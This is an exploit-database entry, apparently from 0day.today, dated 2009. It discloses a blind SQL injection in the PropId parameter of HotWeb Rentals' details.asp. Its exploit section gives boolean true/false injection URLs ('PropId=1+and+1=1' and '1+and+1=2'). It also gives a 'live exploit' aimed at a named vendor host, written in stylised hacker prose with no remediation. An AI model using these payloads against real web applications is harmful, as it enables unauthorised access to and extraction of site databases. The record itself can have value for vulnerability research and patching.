HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln

2009-09-15T00:00:00
ID 1337DAY-ID-5767
Type zdt
Reporter R3d-D3v!L
Modified 2009-09-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln
============================================================



[+] Tybe:(details.asp PropId) BL!ND SQL Injection Vulnerability
[+]
[+] Vendor: www.hotwebscripts.co.uk
[+]
[+] Software: HotWeb Rentals 
[+]
[+] Date: 15.2.2009
[+]


[+] ERR0R CONSOLE

WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N)

[+]SECURE ALERT FR0M 7h3 R3d-D3V!L

[+] Exploit:

[+] TRU3 : details.asp?PropId=1+and+1=1


[+] FALS3 : details.asp?PropId=1+and+1=2

[+]liv3 3xpL0!T:
[+] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
[+] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2



[~]--------------------------------------------------------------------------------



#  0day.today [2018-01-04]  #